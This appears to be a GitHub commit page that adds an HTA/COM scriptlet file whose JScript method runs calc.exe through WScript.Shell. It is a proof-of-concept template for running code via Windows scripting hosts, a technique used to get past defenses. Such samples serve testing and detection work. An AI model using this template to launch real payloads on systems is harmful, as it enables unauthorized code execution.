We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
There was an error while loading. Please reload this page.
1 parent 4eaa150 commit 549f5e5Copy full SHA for 549f5e5
Assets/mshta.hta
@@ -0,0 +1,16 @@
1
+<?XML version="1.0"?>
2
+<scriptlet>
3
+<registration description="Desc" progid="Progid" version="0" classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}"></registration>
4
+
5
+<public>
6
+ <method name="Exec"></method>
7
+</public>
8
9
+<script language="JScript">
10
+<![CDATA[
11
+ function Exec() {
12
+ var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
13
+ }
14
+]]>
15
+</script>
16
+</scriptlet>
0 commit comments